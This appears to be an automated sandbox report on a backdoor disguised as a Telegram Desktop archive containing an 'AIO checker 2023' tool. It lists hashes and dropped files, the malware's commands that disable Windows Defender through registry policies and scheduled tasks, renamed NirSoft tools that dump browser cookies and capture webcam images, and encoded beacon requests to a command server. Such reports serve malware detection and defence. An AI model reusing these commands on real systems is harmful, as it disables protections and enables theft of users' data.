| File name: | Telegram Desktop.zip |
| Full analysis: | https://app.any.run/tasks/c3692749-966a-4163-85e7-43ed42a973b6 |
| Verdict: | Malicious activity |
| Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
| Analysis date: | March 08, 2024, 19:41:21 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 311F8E33DE278E9A2A3A09086CB444E1 |
| SHA1: | 7D1006C3D39D868DE2540BE2E888CE4C4C35A6D3 |
| SHA256: | D86296CBA8A3752B0D794CE152830A544EC7CD7B64DBCDF2ACA73481CEC59DE9 |
| SSDEEP: | 98304:d/jRLcZisO7KOFogtb4Kfcsoc6BfjJRSZWPNqQWnGV6ZaSZNkHKaVANJxZ6K9R3w:LFwHSPgOCQMnR6G7oK3u40zy |
| .zip | | | ZIP compressed archive (100) |
|---|
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | - |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2024:03:08 22:08:54 |
| ZipCRC: | 0xee9d007f |
| ZipCompressedSize: | 2018010 |
| ZipUncompressedSize: | 2017354 |
| ZipFileName: | AIO checker 2023.rar |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 584 | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 664 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 752 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | C:\Windows\System32\schtasks.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 784 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 848 | "C:\Users\admin\AppData\Roaming\ms_updater.exe" | C:\Users\admin\AppData\Roaming\ms_updater.exe | AIO checker 2023.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
| 948 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1000 | C:\Users\admin\AppData\Local\Temp\hh.exe /stext "C:\Users\admin\AppData\Local\Temp\Cookies3" | C:\Users\admin\AppData\Local\Temp\hh.exe | — | cmd.exe | |||||||||||
User: admin Company: NirSoft Integrity Level: MEDIUM Description: EdgeCookiesView Exit code: 0 Version: 1.17 | |||||||||||||||
| 1124 | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤ | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1168 | C:\Users\admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\admin\AppData\Local\Temp\capture.png" | C:\Users\admin\AppData\Local\Temp\bfsvc.exe | — | cmd.exe | |||||||||||
User: admin Company: NirSoft Integrity Level: MEDIUM Description: WebCamImageSave Exit code: 3221225547 Version: 1.11 | |||||||||||||||
| 1504 | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | C:\Windows\System32\schtasks.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\Telegram Desktop.zip | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3864) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3864 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3864.39537\Checker Zalando.rar | — | |
MD5:— | SHA256:— | |||
| 3864 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa3864.39537\AIO checker 2023.rar | compressed | |
MD5:90A345AC93B006DEA131ACA168718391 | SHA256:A47BA41E74559A9121C6687FED7BF6CB32EC4659557A1B7D8790D300926A064A | |||
| 2852 | WinRAR.exe | C:\Users\admin\Desktop\CC Checker AcTeam.exe | executable | |
MD5:EF1999D5B9E6552E39F691A3631469B6 | SHA256:33489E9AA842320D1175C609EBE01A35645F0D945BAEFD4F4F345A966000EA4A | |||
| 2852 | WinRAR.exe | C:\Users\admin\Desktop\README.txt | text | |
MD5:229BFB07694F123E2CB4986F47100A62 | SHA256:8DF26B1F550C80646F01D25B8AAFCABB1342BBB2BE1CD335CDB8D254BE8C4090 | |||
| 2852 | WinRAR.exe | C:\Users\admin\Desktop\elshyph.dll | executable | |
MD5:6886E3F01425562C23467DA967B643FE | SHA256:367322687653B2D0836473FB1B863275E276A5B2AAE5C494FC5F786CF52AB471 | |||
| 2852 | WinRAR.exe | C:\Users\admin\Desktop\dnscmmc.dll | executable | |
MD5:BDC7EAD1E9B59A54F61AD53EC7FEFFFB | SHA256:4F64DC86D26FF64F037EEA6FE2E8F7224A8F5988C132EBF617EC6A562080FB01 | |||
| 3500 | AIO checker 2023.exe | C:\Users\admin\AppData\Roaming\ms_updater.exe | executable | |
MD5:9195E6C24D5BC6FC15E3720D53021D60 | SHA256:22120341BEA07E0830B02CFD910C64D653B102D5BBFCFF89675BB8AB3996A3CA | |||
| 2852 | WinRAR.exe | C:\Users\admin\Desktop\dmview.ocx | executable | |
MD5:9D3D06D04B20C9A61394144DCCF7E54C | SHA256:F11DF95FAE783DDFD452A888BEDAC3B084405CABE20F36BE26000A1738D97C9F | |||
| 3500 | AIO checker 2023.exe | C:\Users\admin\AppData\Roaming\ms_update.exe | executable | |
MD5:1D4ED7311DEA909CC611A87C49BA3C0D | SHA256:05FFEBB5C07F918E31AD85B05118FAE2E8C556F07BCD473EF9047654B123E907 | |||
| 3276 | ms_update.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe | executable | |
MD5:1D4ED7311DEA909CC611A87C49BA3C0D | SHA256:05FFEBB5C07F918E31AD85B05118FAE2E8C556F07BCD473EF9047654B123E907 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
848 | ms_updater.exe | GET | 200 | 188.114.96.3:80 | http://355212cm.nyashnyash.top/nyashsupport.php?yie8Ahobes05lQqm5zDn725pEgU6=8ajb&7d2ec6fa11a45062f73c3371e90be2d7=d2bcd0f2865f35a89899afe230c1002a&e95b42d7b0485703d17241e76e2b8585=AM5gzYmdjMklTM3QGNjJjNkdzY1QjYjFTMjhzM5YTN4UGNxgTZ3ITZ&yie8Ahobes05lQqm5zDn725pEgU6=8ajb | unknown | text | 2.07 Kb | unknown |
848 | ms_updater.exe | GET | 200 | 188.114.96.3:80 | http://355212cm.nyashnyash.top/nyashsupport.php?VChnrne0pWN6OUvbyLx=2fpnK3MdUTBHs9KC1JD&8Kp0YJjcTuh6rHq0W3cyb=gW&GNOKtkoHImsz=PBTtKkvEZkSUp7qPN7oSeS6VSk&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyQzN2YjN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nIiBDNxEDOwIDN5QmZiRjNkZDZ5QmM4QDOjVDZ0E2NkdzMyQWY5YGOxIiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W | unknown | text | 104 b | unknown |
848 | ms_updater.exe | GET | 200 | 188.114.96.3:80 | http://355212cm.nyashnyash.top/nyashsupport.php?VChnrne0pWN6OUvbyLx=2fpnK3MdUTBHs9KC1JD&8Kp0YJjcTuh6rHq0W3cyb=gW&GNOKtkoHImsz=PBTtKkvEZkSUp7qPN7oSeS6VSk&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyQzN2YjN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W | unknown | text | 908 b | unknown |
848 | ms_updater.exe | GET | 200 | 188.114.96.3:80 | http://355212cm.nyashnyash.top/nyashsupport.php?VChnrne0pWN6OUvbyLx=2fpnK3MdUTBHs9KC1JD&8Kp0YJjcTuh6rHq0W3cyb=gW&GNOKtkoHImsz=PBTtKkvEZkSUp7qPN7oSeS6VSk&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyQzN2YjN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&a05939b54e910a520ed16f4659e1d224=0VfiIiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W | unknown | text | 104 b | unknown |
848 | ms_updater.exe | GET | 200 | 188.114.96.3:80 | http://355212cm.nyashnyash.top/nyashsupport.php?VChnrne0pWN6OUvbyLx=2fpnK3MdUTBHs9KC1JD&8Kp0YJjcTuh6rHq0W3cyb=gW&GNOKtkoHImsz=PBTtKkvEZkSUp7qPN7oSeS6VSk&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyQzN2YjN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&60fcc970050c21131ef204c321f6004c=d1nI5oUeaVHbXJGa50WVjhnVZBjRHJ1dChVUjhHbiBXMHpFa4ZEW6pEWapnVGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETp10Mi5GbtN2aG12Ymh3VaBnSulFak1WS2kUajxmTYZFdGdlWw4EbJN3dHJWM102TpNWbihGeVJGaWdEZUp0QMlGMXlFbSNzY21EWaNHbtp1ZwcVW5RmMilnQzwkNN1WS2k0QhBjRHVFdGdlWw4EbJNXSTtkdsdkWxYURJNza6pERGVUSyZ1RkNnRXp1UoNUS1xWRJxWNXFWT1cEW5hXMiBnUXRmQClnT1MWeRJkQ5FGbShkYoZVbV9WQTpVd5cUY3lTbjpGbXRVavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIWY3MjM4YDNlhzNyYjYlNWYmBjYjRDO5QzYiNDOykTNiwiIyQjY5MWN5ITMxUGZiFmZhZWMmVmZmRmMhFWNxQzNlJzMmVWZ4AjZhJiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W | unknown | text | 104 b | unknown |
848 | ms_updater.exe | GET | 200 | 188.114.96.3:80 | http://355212cm.nyashnyash.top/nyashsupport.php?VChnrne0pWN6OUvbyLx=2fpnK3MdUTBHs9KC1JD&8Kp0YJjcTuh6rHq0W3cyb=gW&GNOKtkoHImsz=PBTtKkvEZkSUp7qPN7oSeS6VSk&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyQzN2YjN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=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 | unknown | text | 104 b | unknown |
848 | ms_updater.exe | GET | 200 | 188.114.96.3:80 | http://355212cm.nyashnyash.top/nyashsupport.php?VChnrne0pWN6OUvbyLx=2fpnK3MdUTBHs9KC1JD&8Kp0YJjcTuh6rHq0W3cyb=gW&GNOKtkoHImsz=PBTtKkvEZkSUp7qPN7oSeS6VSk&b4ab245d5ee8fea7e77fa9fa30f5388b=2QTOxgzYmZmZxUzYzcDM5IWMmJWZmZDOidDZ3ATYzgTMyIGMzMWNhVDM0MDNyETNyQzN2YjN&e95b42d7b0485703d17241e76e2b8585=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&c99321a829dc5e86d2744a321e9e8225=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiMzMldTNwUzM3ITZyUmMxYWM2gTOkVGM1ITYyETO5UGMiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiIGZiRzNhFTO2cTYzYGMkFWYiZWM3IDZlRGM4IWZ0ImYis3W&a05939b54e910a520ed16f4659e1d224=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